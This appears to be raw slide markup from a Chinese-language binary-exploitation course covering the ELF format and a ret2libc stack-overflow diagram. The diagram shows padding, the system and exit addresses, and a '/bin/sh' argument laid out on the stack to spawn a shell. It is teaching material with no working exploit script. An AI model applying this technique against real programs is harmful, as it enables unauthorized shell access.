              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A357E0F-0C05-4298-9FE4-18E71B75D76D}"/>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ret2libc</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484"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1486" name="Shape 1486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="24940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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1487" name="Shape 1487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="29036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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1488" name="Shape 1488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="33132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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1489" name="Shape 1489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="37228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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Shape 1490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="162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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1491" name="Shape 1491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="20844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0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1492" name="Shape 1492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="3111667"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1493" name="Shape 1493"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="3316467"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1494" name="Shape 1494"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="3641200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1495" name="Shape 1495"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="409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Overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1496" name="Shape 1496"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="911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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1497" name="Shape 1497"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1498" name="Shape 1498"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="5240535"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1499" name="Shape 1499"/>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867" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1500" name="Shape 1500"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1501" name="Shape 1501"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="182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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>stack overflow:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1502" name="Shape 1502"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018800" y="2496467"/>
            <a:ext cx="15016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FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>argument 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1503" name="Shape 1503"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="2700467"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E734AB-BC17-4D89-93C2-FEE1F58FA77B}"/>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ret2libc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E599CD0-8759-42A7-8550-5B0375F44704}"/>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0" y="400110"/>
            <a:ext cx="12192000" cy="6470769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420880" y="5982236"/>
            <a:ext cx="1999265" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA57B2A-F19A-4C54-839D-F7DD6596C1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>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二进制基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> | Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298532777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507"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1509" name="Shape 1509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="24940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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1510" name="Shape 1510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="29036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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1511" name="Shape 1511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="33132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Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1512" name="Shape 1512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="37228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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
